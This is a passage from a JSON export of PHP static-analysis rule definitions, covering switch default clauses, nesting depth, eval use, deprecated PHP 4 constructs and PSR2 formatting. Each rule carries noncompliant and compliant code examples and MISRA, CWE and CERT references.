<\/li>\n  <li> MISRA C:2012, 16.6 - Every switch statement shall have at least two switch-clauses <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S131","repo":"php","name":"Statements should end with a \"case default\" clause","htmlDesc":"<p>The requirement for a final <code>case default<\/code> clause is defensive programming. The clause should either take appropriate action, or contain\na suitable comment as to why no action is taken. Even when the <code>switch<\/code> covers all current values of an <code>enum<\/code>, a default case\nshould still be used because there is no guarantee that the <code>enum<\/code> won't be extended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($param) {  \/\/missing default clause\n  case 0:\n    do_something();\n    break;\n  case 1:\n    do_something_else();\n    break;\n}\n\nswitch ($param) {\n  default: \/\/ default clause should be the last one\n    error();\n    break;\n  case 0:\n    do_something();\n    break;\n  case 1:\n    do_something_else();\n    break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($param) {\n  case 0:\n    do_something();\n    break;\n  case 1:\n    do_something_else();\n    break;\n  default:\n    error();\n    break;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n  <li> MISRA C:2004, 15.3 - The final clause of a switch statement shall be the default clause <\/li>\n  <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. 
<\/li>\n  <li> MISRA C++:2008, 6-4-6 - The final clause of a switch statement shall be the default-clause <\/li>\n  <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n  <li> MISRA C:2012, 16.4 - Every <em>switch<\/em> statement shall have a <em>default<\/em> label <\/li>\n  <li> MISRA C:2012, 16.5 - A <em>default<\/em> label shall appear as either the first or the last <em>switch label<\/em> of a <em>switch<\/em> statement\n  <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/478.html\">MITRE, CWE-478<\/a> - Missing Default Case in Switch Statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S134","repo":"php","name":"Control flow statements \"if\", \"for\", \"while\", \"switch\" and \"try\" should not be nested too deeply","htmlDesc":"<p>Nested <code>if<\/code>, <code>for<\/code>, <code>while<\/code>, <code>switch<\/code>, and <code>try<\/code> statements are a key ingredient for making\nwhat's known as \"Spaghetti code\".<\/p>\n<p>Such code is hard to read, refactor and therefore maintain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With a threshold of 3:<\/p>\n<pre>\n  if (condition1) {                  \/\/ Compliant - depth = 1\n    ...\n    if (condition2) {                \/\/ Compliant - depth = 2\n      ...\n      for ($i = 0; $i &lt; 10; $i++) { \/\/ Compliant - depth = 3, not exceeding the limit\n        ...\n        if (condition4) {            \/\/ Non-Compliant - depth = 4\n          if (condition5) {          \/\/ Depth = 5, exceeding the limit, but issues are only reported on depth = 4\n            ...\n          }\n          return;\n        }\n      }\n    }\n  }\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum allowed control flow statement nesting depth.","defaultValue":"4","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S138","repo":"php","name":"Functions should not have too many lines","htmlDesc":"<p>A function that grows too large tends to aggregate too many responsibilities.<\/p>\n<p>Such functions inevitably become harder to understand and therefore harder to maintain. <\/p>\n<p>Above a specific threshold, it is strongly advised to refactor into smaller functions which focus on well-defined tasks.<\/p>\n<p>Those smaller functions will not only be easier to understand, but also probably easier to test.<\/p>","status":"READY","tags":["rank3"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum authorized lines in a function","defaultValue":"150","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S139","repo":"php","name":"Comments should not be located at the end of lines of code","htmlDesc":"<p>This rule verifies that single-line comments are not located at the ends of lines of code. 
The main idea behind this rule is that in order to be\nreally readable, trailing comments would have to be properly written and formatted (correct alignment, no interference with the visual structure of\nthe code, not too long to be visible) but most often, automatic code formatters would not handle this correctly: the code would end up less readable.\nComments are far better placed on the previous empty line of code, where they will always be visible and properly formatted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$a = $b + $c; \/\/ This is a trailing comment that can be very very long\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/\/ This very long comment is better placed before the line of code\n$a = $b + $c;\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"legalTrailingCommentPattern","htmlDesc":"Pattern for text of trailing comments that are allowed. By default, comments containing only one word.","defaultValue":"^(\/\/|#)\\s*+[^\\s]++$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1479","repo":"php","name":"\"switch\" statements should not have too many \"case\" clauses","htmlDesc":"<p>When <code>switch<\/code> statements have large sets of <code>case<\/code> clauses, it is usually an attempt to map two sets of data. A real map\nstructure would be more readable and maintainable, and should be used instead.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of case","defaultValue":"30","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1481","repo":"php","name":"Unused local variables should be removed","htmlDesc":"<p>If a local variable is declared but not used, it is dead code and should be removed. 
Doing so will improve maintainability because developers will\nnot wonder what the variable is used for.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction numberOfMinutes($hours) {\n  $seconds = 0;   \/\/ $seconds is never used\n  return $hours * 60;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction numberOfMinutes($hours) {\n  return $hours * 60;\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1488","repo":"php","name":"Local Variables should not be declared and then immediately returned or thrown","htmlDesc":"<p>Declaring a variable only to immediately return or throw it is a bad practice.<\/p>\n<p>Some developers argue that the practice improves code readability, because it enables them to explicitly name what is being returned. However, this\nvariable is an internal implementation detail that is not exposed to the callers of the method. The method name should be sufficient for callers to\nknow exactly what will be returned.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction compute_duration_in_milliseconds($hours, $minutes, $seconds) {\n  $duration = ((($hours * 60) + $minutes) * 60 + $seconds) * 1000;\n  return $duration;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction compute_duration_in_milliseconds($hours, $minutes, $seconds) {\n  return ((($hours * 60) + $minutes) * 60 + $seconds) * 1000;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1523","repo":"php","name":"Code should not be dynamically injected and executed","htmlDesc":"<p>The <code>eval<\/code> language construct is a way to run arbitrary code at run-time. Any attacker-controlled data that reaches it becomes remote code execution. <\/p>\n<p>According to the PHP documentation:<\/p>\n<blockquote>\n  <p>The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. 
If you have\n  carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it\n  without properly validating it beforehand.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\neval($code_to_be_dynamically_executed);  \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/95.html\">MITRE CWE-95<\/a> - CWE-95: Improper Neutralization of Directives in Dynamically\n  Evaluated Code ('Eval Injection') <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n  (XSS) <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S1536","repo":"php","name":"Function argument names should be unique","htmlDesc":"<p>Function arguments should all have different names to prevent any ambiguity. Indeed, if arguments have the same name, the last duplicated argument\nhides all the previous arguments with the same name. This hiding makes no sense, reduces understandability and maintainability, and obviously can be\nerror-prone. Since PHP 7.0, declaring a function with duplicated parameter names is a compile-time fatal error, so this can only occur in code written\nfor PHP 5. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction compute($a, $a, $c) { \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction compute($a, $b, $c) { \/\/ Compliant\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1599","repo":"php","name":"Variable variables should not be used","htmlDesc":"<p>PHP's \"variable variables\" feature (dynamically-named variables) is temptingly powerful, but can lead to unmaintainable code. 
<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$var = 'foo';\n$$var = 'bar';      \/\/ Noncompliant\n$$$var = 'hello';   \/\/ Noncompliant\n\necho $foo; \/\/ will display 'bar'\necho $bar; \/\/ will display 'hello'\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1600","repo":"php","name":"Deprecated predefined variables should not be used","htmlDesc":"<p>The following predefined variables (the PHP 4 \"long arrays\") are deprecated, and were removed entirely in PHP 5.4.0; they should be replaced by the\nnew versions:<\/p>\n<table>\n  <tbody>\n    <tr>\n      <th>Replace<\/th>\n      <th>With<\/th>\n    <\/tr>\n    <tr>\n      <td>$HTTP_SERVER_VARS<\/td>\n      <td>$_SERVER<\/td>\n    <\/tr>\n    <tr>\n      <td>$HTTP_GET_VARS<\/td>\n      <td>$_GET<\/td>\n    <\/tr>\n    <tr>\n      <td>$HTTP_POST_VARS<\/td>\n      <td>$_POST<\/td>\n    <\/tr>\n    <tr>\n      <td>$HTTP_POST_FILES<\/td>\n      <td>$_FILES<\/td>\n    <\/tr>\n    <tr>\n      <td>$HTTP_SESSION_VARS<\/td>\n      <td>$_SESSION<\/td>\n    <\/tr>\n    <tr>\n      <td>$HTTP_ENV_VARS<\/td>\n      <td>$_ENV<\/td>\n    <\/tr>\n    <tr>\n      <td>$HTTP_COOKIE_VARS<\/td>\n      <td>$_COOKIE<\/td>\n    <\/tr>\n  <\/tbody>\n<\/table>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\necho 'Name parameter value: ' . $HTTP_GET_VARS[\"name\"];\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\necho 'Name parameter value: ' . $_GET[\"name\"];\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1603","repo":"php","name":"PHP 4 constructor declarations should not be used","htmlDesc":"<p>In PHP 4, any function with the same name as the enclosing class was considered a class constructor. PHP 5 introduced the\n\"__construct\" method name, which should be used instead; PHP 7.0 deprecated the PHP 4 style and PHP 8.0 removed it. If both styles are present in the\nsame class, PHP 5 and later treat the function named \"__construct\"\nas the class constructor. 
<\/p>\n<p>This rule raises an issue for each method with the same name as the enclosing class.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo {\n  function Foo() { ... }  \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo {\n  function __construct() { ... }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1605","repo":"php","name":"\"__construct\" functions should not make PHP 4-style calls to parent constructors","htmlDesc":"<p>In PHP 5 both the way to declare a constructor and the way to call a parent constructor have evolved. When declaring constructors with\nthe PHP 5 <code>__construct<\/code> name, calls to parent constructors should also use the new <code>__construct<\/code> name rather than the parent\nclass name.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo extends Bar {\n  function __construct() {\n    parent::Bar();  \/\/ Noncompliant\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo extends Bar {\n  function __construct() {\n    parent::__construct();\n  }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1656","repo":"php","name":"Variables should not be self-assigned","htmlDesc":"<p>There is no reason to re-assign a variable to itself. 
Either this statement is redundant and should be removed, or the re-assignment is a mistake\nand some other value or variable was intended for the assignment instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic function setName($name) {\n    $name = $name;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic function setName($name) {\n    $this-&gt;name = $name;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1757","repo":"php","name":"\"<?php\" and \"<?=\" tags should be used","htmlDesc":"<p>Coding conventions allow teams to collaborate effectively. For maximum standardization and readability, PHP code should use the long <code>&lt;?php\n?&gt;<\/code> tags or the short-echo <code>&lt;?= ?&gt;<\/code> tags; it should not use the other tag variations.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?\n$foo = 1;\n?&gt;\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\n$foo = 1;\n?&gt;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1763","repo":"php","name":"Jump statements should not be followed by other statements","htmlDesc":"<p>Jump statements (<code>return<\/code>, <code>break<\/code>, <code>continue<\/code>, and <code>goto<\/code>) and <code>throw<\/code> expressions move\ncontrol flow out of the current code block. Typically, any statements in a block that come after a jump or <code>throw<\/code> are simply wasted\nkeystrokes lying in wait to confuse the unwary. <\/p>\n<p>Rarely, as illustrated below, code after a jump or <code>throw<\/code> is reachable. 
However, such code is difficult to understand, and should be\nrefactored. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction fun($a) {\n  $i = 10;\n  return $i + $a;\n  $i++;             \/\/ this is never executed\n}\n\nfunction foo($a) {\n  if ($a == 5) {\n    goto error;\n  } else {\n    \/\/ do the job\n  }\n  return;\n\n  error:\n    printf(\"don't use 5\"); \/\/ this is reachable but unreadable\n\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction fun($a) {\n  $i = 10;\n  return $i + $a;\n}\n\nfunction foo($a) {\n  if ($a == 5) {\n    handleError();\n  } else {\n    \/\/ do the job\n  }\n  return;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C++:2008, 0-1-9 - There shall be no dead code <\/li>\n  <li> MISRA C:2012, 2.2 - There shall be no dead code <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/561.html\">MITRE, CWE-561<\/a> - Dead Code <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/OYIyAQ\">CERT, MSC07-CPP.<\/a> - Detect and remove dead code <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1764","repo":"php","name":"Identical expressions should not be used on both sides of a binary operator","htmlDesc":"<p>Using the same value on either side of a binary operator is almost always a mistake. In the case of logical operators, it is either a copy\/paste\nerror and therefore a bug, or it is simply wasted code, and should be simplified. In the case of bitwise operators and most binary mathematical\noperators, having the same value on both sides of an operator yields predictable results, and should be simplified.<\/p>\n<p>This rule ignores <code>*<\/code>, <code>+<\/code>, and <code>=<\/code>. 
<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ( $a == $a ) { \/\/ always true\n  doZ();\n}\nif ( $a != $a ) { \/\/ always false\n  doY();\n}\nif ( $a == $b &amp;&amp; $a == $b ) { \/\/ if the first one is true, the second one is too\n  doX();\n}\nif ( $a == $b || $a == $b ) { \/\/ if the first one is true, the second one is too\n  doW();\n}\n\n$j = 5 \/ 5; \/\/always 1\n$k = 5 - 5; \/\/always 0\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Left-shifting 1 onto 1 is common in the construction of bit masks, and is ignored.<\/p>\n<pre>\n$i = 1 &lt;&lt; 1; \/\/ Compliant\n$j = $a &lt;&lt; $a; \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n  <li> <a href='\/coding_rules#rule_key=php%3AS1656'>S1656<\/a> - Implements a check on <code>=<\/code>. <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1765","repo":"php","name":"The \"var\" keyword should not be used","htmlDesc":"<p>The PHP 4 method of declaring a variable, using the <code>var<\/code> keyword, was deprecated in early versions of PHP 5. Even though it's not\nconsidered deprecated in the most recent versions, it's nonetheless not best practice to use it. When <code>var<\/code> does appear, it is interpreted\nas a synonym for <code>public<\/code> and treated as such. 
Therefore <code>public<\/code> should be used instead.<\/p>\n<p>From the PHP Manual:<\/p>\n<blockquote>\n  <p>The PHP 4 method of declaring a variable with the var keyword is still supported for compatibility reasons (as a synonym for the public keyword).\n  In PHP 5 before 5.1.3, its usage would generate an E_STRICT warning.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php\nclass Foo\n{\n    var $bar = 1;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\nclass Foo\n{\n    public $bar = 1;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1766","repo":"php","name":"More than one property should not be declared per statement","htmlDesc":"<p>For better readability, do not put multiple property declarations in the same statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php\nclass Foo\n{\n   private $bar = 1, $bar2 = 2;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\nclass Foo\n{\n   private $bar1 = 1;\n   private $bar2 = 2;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1779","repo":"php","name":"Only LF character (Unix-like) should be used to end lines","htmlDesc":"<p>All developers should use the same end-line character(s) to prevent polluting the history changelog of source files in the SCM engine. 
Moreover\nsome SCM engines like Git might sometimes badly support use of Windows 'CRLF' end of line characters.<\/p>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1780","repo":"php","name":"Closing tag \"?>\" should be omitted on files containing only PHP","htmlDesc":"<p>According to the PSR2 coding standard:<\/p>\n<blockquote>\n  <p>The closing <code>?&gt;<\/code> tag should be omitted from files containing only PHP.<\/p>\n<\/blockquote>\n<p>According to the PHP manual:<\/p>\n<blockquote>\n  <p>in some cases omitting it is helpful when using include or require, so unwanted whitespace will not occur at the end of files, and you will still\n  be able to add headers to the response later. It is also handy if you use output buffering, and would not like to see added unwanted whitespace at\n  the end of the parts generated by the included files.<\/p>\n<\/blockquote>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1781","repo":"php","name":"PHP keywords and constants \"true\", \"false\", \"null\" should be lower case","htmlDesc":"<p>Using indifferently lower or upper case for PHP keywords and constants \"true\", \"false\" and \"null\" can impact the readability of PHP source\ncode.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php ECHO 'Hello World'; ?&gt;\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php echo 'Hello World'; ?&gt;\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1784","repo":"php","name":"Method visibility should be explicitly declared","htmlDesc":"<p>Class methods may be defined as public, private, or protected. Methods declared without any explicit visibility keyword are defined as public. 
To\nprevent any misunderstanding, this visibility should always be explicitly declared.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo(){...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic function foo(){...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1788","repo":"php","name":"Method arguments with default values should be last","htmlDesc":"<p>The ability to define default values for method arguments can make a method easier to use. Default argument values allow callers to specify as many\nor as few arguments as they want while getting the same functionality and minimizing boilerplate, wrapper code. <\/p>\n<p>But all method arguments with default values should be declared after the method arguments without default values. Otherwise, it makes it\nimpossible for callers to take advantage of defaults; they must re-specify the defaulted values in order to \"get to\" the non-default arguments.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction makeyogurt($type = \"acidophilus\", $flavor){...}  \/\/ Noncompliant\n\nmakeyogurt(\"raspberry\")}}  \/\/ Runtime error: Missing argument 2 in call to makeyogurt()\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction makeyogurt($flavor, $type = \"acidophilus\", ){...}\n\nmakeyogurt(\"raspberry\")}} \/\/ Works as expected\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1793","repo":"php","name":"\"elseif\" keyword should be used in place of \"else if\" keywords","htmlDesc":"<p>According to the PSR2 coding standard:<\/p>\n<blockquote>\n  <p>The keyword <code>elseif<\/code> SHOULD be used instead of <code>else if<\/code> so that all control keywords look like single words.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($expr1) {\n  ...\n} else if ($expr2) {\n  ...\n} else {...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($expr1) {\n  ...\n} elseif ($expr2) 
{\n  ...\n} else {...}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1799","repo":"php","name":"\"exit(...)\" and \"die(...)\" statements should not be used","htmlDesc":"<p>The <code>exit(...)<\/code> and <code>die(...)<\/code> statements should absolutely not be used in Web PHP pages as this might lead to a very bad\nuser experience. In such case, the end user might have the feeling that the web site is down or has encountered a fatal error. <\/p>\n<p>But of course PHP can also be used to develop command line application and in such case use of <code>exit(...)<\/code> or <code>die(...)<\/code>\nstatement can be justified but must remain limited and not spread all over the application. We expect exceptions to be used to handle errors and those\nexceptions should be caught just before leaving the application to specify the exit code with help of <code>exit(...)<\/code> or <code>die(...)<\/code>\nstatements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo {\n    public function bar($param)  {\n        if ($param === 42) {\n            exit(23);\n        }\n    }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo {\n    public function bar($param)  {\n        if ($param === 42) {\n            throw new Exception('Value 42 is not expected.');\n        }\n    }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1808","repo":"php","name":"Source code should comply with formatting standards","htmlDesc":"<p>Shared coding conventions make it possible for a team to collaborate efficiently. This rule raises issues for failures to comply with formatting\nstandard. 
The default parameter values conform to the PSR2 standard.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default PSR2 parameter values:<\/p>\n<pre>\nuse FooClass;\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002  \/\/ Noncompliant; the \"use\" declaration should be placed after the \"namespace\" declaration\n\nnamespace Vendor\\Package;\nuse FooClass;\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002  \/\/ Noncompliant; the \"namespace\" declaration should be followed by a blank line\n$foo = 1;\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002  \/\/ Noncompliant; the \"use\" declaration should be followed by a blank line\n\nclass ClassA {\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002 \u2002 \u2002\/\/ Noncompliant; an open curly brace should be at the beginning of a new line for classes and functions\n\u2002\u2002function my_function(){ \u2002\/\/ Noncompliant; curly brace on wrong line\n\u2002\u2002\u2002\u2002if ($firstThing)\u2002\u2002\u2002\u2002\u2002\u2002\u2002\/\/ Noncompliant; an open curly brace should be at the end of line for a control structure\n\u2002\u2002\u2002\u2002{\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n\u2002\u2002\u2002\u2002if ($secondThing)\u2002   {\u2002\/\/ Noncompliant; there should be exactly one space between the closing parenthesis and the opening curly brace\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n    if($thirdThing) {      \/\/ Noncompliant; there should be exactly one space between the control structure keyword and the opening parenthesis\n      ...\n    }\n    else {                 \/\/ Noncompliant; the close curly brace and the next \"else\" (or \"catch\" or \"finally\") keyword should be located on the same line\n      ...\n    }\n\n    try{                   \/\/ Noncompliant; there should be exactly one space between the control structure keyword and the 
curly brace\n      ...\n    } catch (Exception $e) {\n\u2002\u2002  }\n\n    analyse( $fruit ) ;    \/\/ Noncompliant; there should not be any space after the opening parenthesis and before the closing parenthesis\n\n    for ($i = 0;$i &lt; 10;   $i++) { \/\/ Nomcompliant; there should be exactly one space after each \";\" in the {{for}} statement\n      ...\n    }\n\n    pressJuice($apply ,$orange);    \/\/ Noncompliant; the comma should be followed by one space and not preceded by any\n\n    do_something ();       \/\/ Noncompliant; there should not be any space after the method name\n\n    foreach ($fruits    as $fruit_key =&gt;     $fruit) {  \/\/ Noncompliant; in the foreach statement there should be one space before and after \"as\" keyword and \"=&gt;\" operator\n      ...\n    }\n  }\n}\n\nclass ClassB\nextends ParentClass  \/\/ Noncompliant; the class name and the \"extends\" \/ \"implements\" keyword should be on the same line\n{\n  ...\n}\n\nclass ClassC extends ParentClass implements \\ArrayAccess, \\Countable,\n    \\Serializable    \/\/ Noncompliant; the list of implemented interfaces should be correctly indented\n{\n\n  public function aVeryLongMethodName(ClassTypeHint $arg1, \/\/ Noncompliant; the arguments in a method declaration should be correctly indented\n    &amp;$arg2, array $arg3 = []) {\n\n    $noArgs_longVars = function () use ($longVar1,         \/\/ Noncompliant; the arguments in a function declaration should be correctly indented\n        $longerVar2,\n        $muchLongerVar3\n    ) {\n      ...\n    };\n\n    $foo-&gt;bar($longArgument,    \/\/ Noncompliant; the arguments in a method call should be correctly indented\n      $longerArgument,\n      $muchLongerArgument);     \/\/ Noncompliant; the closing parenthesis should be placed on the next line\n\n    $closureWithArgsAndVars = function($arg1, $arg2)use   ($var1, $var2) {  \/\/ Noncompliant; the closure declaration should be correctly spaced - see (5)\n      ...\n    };\n  
}\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nnamespace Vendor\\Package; \/\/ Compliant; the \"namespace\" declaration is followed by a blank line\n\nuse FooClass;             \/\/ Compliant; the \"use\" declaration is placed after the \"namespace\" declaration\n                          \/\/ Compliant; the \"use\" declaration is followed by a blank line\n$foo = 1;\n\nclass ClassA\n{\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002           \u2002\/\/ Compliant; the open curly brace is at the beginning of a new line for the class\n\u2002\u2002function my_function()\n  {\u2002\u2002\u2002\u2002                   \/\/ Compliant; the open curly brace is at the beginning of a new line for the function\n\u2002\u2002\u2002\u2002if ($firstThing)\u2002{\u2002\u2002\u2002\u2002\/\/ Compliant; the open curly brace is at the end of line for the control structure\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n\u2002\u2002\u2002\u2002if ($secondThing)\u2002{\u2002\u2002 \/\/ Compliant; there is exactly one space between the closing parenthesis and the opening curly brace\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n    if ($thirdThing) {    \/\/ Compliant; there is exactly one space between the control structure keyword and the opening parenthesis\n      ...\n    } else {              \/\/ Compliant; the close curly brace and the next \"else\" (or \"catch\" or \"finally\") keyword are located on the same line\n      ...\n    }\n\n    try {                 \/\/ Compliant; there is exactly one space between the control structure keyword and the curly brace\n      ...\n    } catch (Exception $e) {\n      ...\n    }\n\n    analyse($fruit);      \/\/ Compliant: there is no space after the opening parenthesis, nor before the closing parenthesis\n\n    for ($i = 0; $i &lt; 10; $i++) { \/\/ Compliant: there is exactly one space after each \";\" in the {{for}} statement\n      ...\n    }\n\n    
